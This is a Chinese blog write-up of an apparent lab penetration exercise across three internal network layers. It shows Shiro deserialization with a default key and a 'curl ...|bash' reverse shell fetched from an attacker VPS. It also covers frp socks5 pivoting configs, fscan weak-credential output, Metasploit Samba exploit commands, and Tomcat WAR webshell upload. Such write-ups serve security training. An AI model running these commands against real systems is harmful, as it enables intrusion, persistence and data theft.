记一次内网靶机实战
创始人
2024-01-20 05:01:17

文章目录

    • 0x00 边界服务器
    • 0x01 一层网络
      • 0x01-01 fscan内网扫描
      • 0x01-02 配置frp设置socks5代理
      • 0x01-03 访问内网的(10.10.135.66)
      • 0x01-04 访问内网的(10.10.135.35)
      • 0x01-05 访问内网的(10.10.135.190)
    • 0x02二层网络
      • 0x02-01 内网扫描
      • 0x02-02 添加路由
      • 0x02-03 访问内网的(172.16.15.111)
      • 0x02-04 访问内网的(172.16.15.115)
      • 0x02-05 访问内网的(172.16.15.187)
      • 0x02-06 访问内网的(172.16.15.88)
      • 0x02-07 访问内网的(172.16.15.145)
      • 0x02-08 tomcat任意文件上传(172.16.15.66:8080)
    • 0x03 三层服务器
      • 0x03-01 内网扫描
      • 0x03-02 添加路由
      • 0x03-03 访问内网的(192.168.13.55)
      • 0x03-04 访问内网的(192.168.13.56)
      • 0x03-05 访问内网的(192.168.13.203)
    • 0x04 总结
      • 0x04-01 网络拓扑
      • 0x04-01 漏洞知识点
    • 摘抄

0x00 边界服务器

访问http://1.xx.xx.xx.:xx7/login
在这里插入图片描述

发现rememberMe字段
在这里插入图片描述
工具检测

shiro 反序列化,上传内存马
[++] 存在shiro框架!
[++] 找到key:kPH+bIxk5D2deZiIxcaaaA==
[+] 爆破结束
[-] 测试:CommonsBeanutils1  回显方式: AllEcho
[-] 测试:CommonsBeanutils1  回显方式: TomcatEcho
[++] 发现构造链:CommonsBeanutils1  回显方式: SpringEcho
[++] 请尝试进行功能区利用。

在这里插入图片描述

远程连接

在这里插入图片描述

反弹shell到云主机,使用curl反弹shell

curl http://82.xx.xx.xx:xx0/bash.html|bash

在这里插入图片描述

0x01 一层网络

0x01-01 fscan内网扫描

通过上传fscan,扫描发现存活主机

10.10.135.1:22 open
10.10.135.35:139 open
10.10.135.35:445 open
10.10.135.190:8080 open
10.10.135.25:8080 open
10.10.135.66:3306 open
[+] mysql:10.10.135.66:3306:root 123456
[*] 10.10.135.35  (Windows 6.1)
[*] WebTitle:http://10.10.135.190:8080 code:200 len:52     title:None
[*] WebTitle:http://10.10.135.25:8080  code:302 len:0      title:None 跳转url: http://10.10.135.25:8080/login;jsessionid=ACFC3E30347DD234AF1E730D02A792E2
[*] WebTitle:http://10.10.135.25:8080/login;jsessionid=ACFC3E30347DD234AF1E730D02A792E2 code:200 len:2608   title:Login Page
[+] InfoScan:http://10.10.135.25:8080/login;jsessionid=ACFC3E30347DD234AF1E730D02A792E2 [Shiro] 
[+] http://10.10.135.190:8080 poc-yaml-struts2_046-1 
[+] http://10.10.135.190:8080 poc-yaml-struts2_045 poc1

在这里插入图片描述
在这里插入图片描述

0x01-02 配置frp设置socks5代理

目标机(1.xx.xx.xx4)frpc
配置远程连接的IP地址(82.xx.xx.xx),通过tcp协议的socks5的7777端口进行通信传输

frpc.ini 
------------------------------------
[common]
server_addr = 82.1xx.xx.xx1
server_port = 7077[plugin_socks5]
type = tcp  #协议
remote_port = 9566 #指定远程服务器的端口
plugin = socks5
------------------------------------
启动客户端
chmod +x frpc
chmod +x frpc.ini
exectue -f ./frpc -c ./frpc.ini

vps(82.xx.xx.xx1)配置frps

frps.ini
-----------------------------------
[common]
bind_port = 7077 #必要,frp服务端端口
------------------------------------
启动服务端
chmod +x frps
chmod +x frps.ini
./frps -c ./frps.ini

踩坑1:忘记在防火墙添加策略,导致失败

frp通道建立成功
在这里插入图片描述
配置好代理
在这里插入图片描述

0x01-03 访问内网的(10.10.135.66)

10.10.135.66:3306:root 123456

在这里插入图片描述

0x01-04 访问内网的(10.10.135.35)

10.10.135.35  (Windows 6.1)

在这里插入图片描述

发现内网存活主机 开展信息搜集,发现该主机系统为linux ,开放139、445端口,其中445端
口为samba 4.6.3 通过search samba 4.6 发现存在漏洞

search samba 4.6 
use exploit/linux/samba/is_known_pipename
set rhosts 10.10.135.35
run 

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

0x01-05 访问内网的(10.10.135.190)

structs漏洞

http://10.10.135.190:8080 poc-yaml-struts2_046-1 
http://10.10.135.190:8080 poc-yaml-struts2_045 poc1

在这里插入图片描述

配置代理,通过proxifer配置socks5代理,把电脑代理到内网,然后使用struts2工具去探测内网漏洞
在这里插入图片描述

执行命令
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

给网站目录下上传文件jsp文件,下载Godzilla,配置代理,成功连接

在这里插入图片描述
在这里插入图片描述

0x02二层网络

0x02-01 内网扫描

./fscan_amd64 -h 172.16.15.0/24 -np 172.16.15.115:3306 open
172.16.15.111:3306 open
172.16.15.88:139 open
172.16.15.145:445 open
172.16.15.88:445 open
172.16.15.66:8009 open
172.16.15.87:8080 open
172.16.15.66:8080 open
172.16.15.187:6379 open
172.16.15.145:139 open
[+] mysql:172.16.15.111:3306:root 123456
[+] Redis:172.16.15.187:6379 unauthorized file:/data/dump.rdb
[+] mysql:172.16.15.115:3306:root 123456
[*] WebTitle:http://172.16.15.66:8080  code:200 len:11230  title:Apache Tomcat/8.0.43
[*] WebTitle:http://172.16.15.87:8080  code:200 len:52     title:None
[*] 172.16.15.145  (Windows 6.1)
[*] 172.16.15.88  (Windows 6.1)
[+] http://172.16.15.87:8080 poc-yaml-struts2_045 poc1
[+] http://172.16.15.66:8080/manager/html poc-yaml-tomcat-manager-weak [{username tomcat} {password tomcat}]

在这里插入图片描述
在这里插入图片描述

此时的获取的内网信息
在这里插入图片描述

0x02-02 添加路由

在边界服务器1.xx.xx.xx:xx7/10.10.135.25上添加路由配置,使得 边界服务器与172.16.15.0/24网段连通
在这里插入图片描述

0x02-03 访问内网的(172.16.15.111)

mysql:172.16.15.111:3306:root 123456

在这里插入图片描述

0x02-04 访问内网的(172.16.15.115)

172.16.15.115:3306:root 123456

在这里插入图片描述

0x02-05 访问内网的(172.16.15.187)

172.16.15.187:6379 unauthorized file:/data/dump.rdb

0x02-06 访问内网的(172.16.15.88)

172.16.15.88  (Windows 6.1)

在这里插入图片描述

0x02-07 访问内网的(172.16.15.145)

172.16.15.145  (Windows 6.1)

在这里插入图片描述

0x02-08 tomcat任意文件上传(172.16.15.66:8080)

http://172.16.15.66:8080/manager/html poc-yaml-tomcat-manager-weak [{username tomcat} {password tomcat}]

burp 设置socks5代理
在这里插入图片描述
在这里插入图片描述

下载冰蝎,然后shell,jsp,进行压缩,生成shell.zip,手动更改后缀shell.war,直接进行文件上传
在这里插入图片描述

访问连接

http://172.16.15.66:8080//shell/shell.jsp
rebeyond

在这里插入图片描述

进行反弹shell
在这里插入图片描述

发现是双网卡
在这里插入图片描述

0x03 三层服务器

0x03-01 内网扫描

./fscan_amd64 -h 192.168.13.0/24
start infoscan
(icmp) Target 192.168.13.106  is alive
(icmp) Target 192.168.13.1    is alive
(icmp) Target 192.168.13.55   is alive
(icmp) Target 192.168.13.56   is alive
(icmp) Target 192.168.13.203  is alive
[*] Icmp alive hosts len is: 5
192.168.13.203:80 open
192.168.13.106:8080 open
192.168.13.56:5432 open
192.168.13.55:3306 open
192.168.13.106:8009 open
192.168.13.1:22 open
[*] alive ports len is: 6
start vulscan
[*] WebTitle:http://192.168.13.106:8080 code:200 len:11230  title:Apache Tomcat/8.0.43
[+] mysql:192.168.13.55:3306:root 123456
[+] Postgres:192.168.13.56:5432:postgres postgres
[*] WebTitle:http://192.168.13.203     code:302 len:312    title:Redirecting to /core/install.php 跳转url: http://192.168.13.203/core/install.php
[+] http://192.168.13.106:8080/manager/html poc-yaml-tomcat-manager-weak [{username tomcat} {password tomcat}]
已完成 5/6 [-] ssh 192.168.13.1:22 root 123qwe ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 5/6 [-] ssh 192.168.13.1:22 root Aa123456! ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 5/6 [-] ssh 192.168.13.1:22 admin admin@123#4 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain

在这里插入图片描述

此时的内网信息收集
在这里插入图片描述

0x03-02 添加路由

在这里插入图片描述

0x03-03 访问内网的(192.168.13.55)

mysql:192.168.13.55:3306:root 123456

在这里插入图片描述

0x03-04 访问内网的(192.168.13.56)

Postgres:192.168.13.56:5432:postgres postgres

在这里插入图片描述

0x03-05 访问内网的(192.168.13.203)

http://192.168.13.203/core/install.php

查看drupal8.5.0的漏洞
在这里插入图片描述

0x04 总结

0x04-01 网络拓扑

在这里插入图片描述

0x04-01 漏洞知识点

1、shiro反序列化漏洞
2、strut2漏洞
3、Drupal漏洞
4、内网代理工具
5、数据库连接工具
6、window的samba漏洞
7、viper的使用

摘抄


很多人都曾梦想做一番大事业,但其实一点点小事累积就成了大事,任何大的成就也都是累积的结果,这就是累积定律。

如果你想获得成长,就从认真完成手头的小任务开始;如果你想拥有一个好身材,就从慢跑1公里开始;如果你想有好的文笔,就从看一本书开始。你想成为一个什么样的人,想过什么样的生活,其实都取决于你每一个决定。

任何事情只要开始就不晚,人生的路,每一步都算数。做你想做的事,努力成为你想成为的人,就从现在开始行动吧。
------累积定律


相关内容

热门资讯

埃菲尔铁塔在哪 中国仿建埃菲尔... 2019年4月26日,广西南宁市,街头惊现一座巨型山寨版埃菲尔铁塔,高约20米,白色塔身,造型逼真,...
苗族的传统节日 贵州苗族节日有... 【岜沙苗族芦笙节】岜沙,苗语叫“分送”,距从江县城7.5公里,是世界上最崇拜树木并以树为神的枪手部落...
苁蓉的食用方法 鲜苁蓉的吃法有... 肉苁蓉号称“温而不热,补而不峻,暖而不燥,滑而不泄,故有从容之名。”历来也是传统药食同源的滋补佳品。...
北京的名胜古迹 北京最著名的景... 北京从元代开始,逐渐走上帝国首都的道路,先是成为大辽朝五大首都之一的南京城,随着金灭辽,金代从海陵王...
应用未安装解决办法 平板应用未... ---IT小技术,每天Get一个小技能!一、前言描述苹果IPad2居然不能安装怎么办?与此IPad不...
脚上的穴位图 脚面经络图对应的... 人体穴位作用图解大全更清晰直观的标注了各个人体穴位的作用,包括头部穴位图、胸部穴位图、背部穴位图、胳...
长白山自助游攻略 吉林长白山游... 昨天介绍了西坡的景点详细请看链接:一个人的旅行,据说能看到长白山天池全凭运气,您的运气如何?今日介绍...
猫咪吃了塑料袋怎么办 猫咪误食... 你知道吗?塑料袋放久了会长猫哦!要说猫咪对塑料袋的喜爱程度完完全全可以媲美纸箱家里只要一有塑料袋的响...
世界上最漂亮的人 世界上最漂亮... 此前在某网上,选出了全球265万颜值姣好的女性。从这些数量庞大的女性群体中,人们投票选出了心目中最美...
埃菲尔铁塔在哪 中国仿建埃菲尔... 2019年4月26日,广西南宁市,街头惊现一座巨型山寨版埃菲尔铁塔,高约20米,白色塔身,造型逼真,...
阳澄湖在哪里哪个省的 阳澄湖是... 点击题目下方苏州生活指南有用 有趣 有态度近期的阳澄湖度很高,3月24日,央视二套《第一时间》直播连...
苗族的传统节日 贵州苗族节日有... 【岜沙苗族芦笙节】岜沙,苗语叫“分送”,距从江县城7.5公里,是世界上最崇拜树木并以树为神的枪手部落...
北京的名胜古迹 北京最著名的景... 北京从元代开始,逐渐走上帝国首都的道路,先是成为大辽朝五大首都之一的南京城,随着金灭辽,金代从海陵王...